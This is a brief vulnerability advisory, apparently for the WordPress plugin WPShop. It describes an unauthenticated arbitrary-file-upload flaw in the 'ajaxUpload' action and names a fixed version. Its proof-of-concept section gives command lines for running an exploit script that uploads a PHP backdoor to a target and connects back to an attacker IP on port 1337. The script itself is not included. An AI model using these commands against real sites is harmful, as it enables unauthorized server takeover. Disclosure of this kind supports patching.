The script ‘includes/ajax.php’ allows execution of various actions by anonymous users. The action name is provided in the ‘elementCode’ parameter. One of these actions is named ‘ajaxUpload’. This function allows for upload of arbitrary files, due to lack of sanitation of user input.
Update to version 18.104.22.168.
-- Proof Of Concept --
require : Python (file.py)
How To use :
Python Name-script.py http://web. com back_python (your-ip) 1337
- Example :
Python wpshop.py http://web. com back_python.php 192.168.2.116 1337